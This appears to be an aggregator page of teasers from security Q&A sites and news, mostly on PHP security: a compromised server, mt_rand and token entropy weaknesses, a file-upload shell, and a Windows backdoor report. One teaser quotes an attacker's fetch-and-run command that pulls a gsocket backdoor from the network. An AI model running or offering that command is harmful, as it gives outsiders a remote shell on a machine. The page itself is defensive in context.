Collaborate Disseminate
My customer server has been compromised. They running this script by the PHP script
bash -c "$(curl -fsSL https://gsocket.io/x)"
and I have several folder in /tmp file as below
-rw——- 1 *** *** 153310 Sep 30 12:07 phpb0wrlJ
… Continue reading Removing Gsocket.io connection from server [duplicate]
If you remember a time when TV news sets universally incorporated a room full of clattering wire service teleprinters to emphasize the seriousness of the news business, congratulations — you’re …read more Continue reading Dot-Matrix Printer Brings Old School Feel to Today’s Headlines
I’m hosting a website on a free hosting provider server that uses PHP for OTP-based authentication. Here’s how it works:
If an unregistered IP address visits the site, it shows an "Unauthorized" message.
For registered IPs, the… Continue reading Is my TOTP key secure on a free hosting provider server with FTP and .htaccess restrictions?
I am creating an exericse for my users, where I am trying to tell them that using mt_rand() is not a good option from security point of view. What I did is that I showed them a normal user who gets a password reset email, the token is gene… Continue reading Usage of Mt_Rand in PHP
I was going through this article, https://www.ambionics.io/blog/php-mt-rand-prediction, which claims that if we use mt_rand(), we can get the seed value using two values instead of brute forcing.
In the article it says:
The first step in … Continue reading Is PHP’s mt_rand function insecure on every platform?
I am using the following code in my code to send a password reset token to a user.
$token = md5($user_id . time());
Why this is considered as a bad approach being cited as it has a weak entropy. The above code would generated a scary look… Continue reading Determining Entropy in PHP
I have recently bought a hosting and hosted my php site, but after hosting site was not loading and showing a round loading image. I thought my files were infected, so I checked on console and I got this error – mixed content error, reques… Continue reading My hosting has no content, but shows error – requested an insecure script ‘http://cdn.jsinit.directfwd.com/sk-jspark_init.php
Vulnerability in the file compressor is allowing hackers to spread viruses and trojans after unpacking the files. The flaw has been discovered and an update is available, but you know how slow people can be to update. Another interesting f… Continue reading Did you know? Vulnerability allows execution of TROJAN after unpacking files" and "Attack on CMS allows data leakage through vulnerabilities
I am testing a web application and I found a file upload vulnerability where I can upload php files to the server with the ability to know the path.
The issue is that when I go to the file path, the php file (which is my shell) gets downlo… Continue reading Executing a PHP file after file upload
A university in Taiwan was breached with “a previously unseen backdoor (Backdoor.Msupedge) utilizing an infrequently seen technique,” Symantec reports.
The most notable feature of this backdoor is that it communicates with a command-and-control serve… Continue reading Hackers Have Found an Entirely New Way To Backdoor Into Microsoft Windows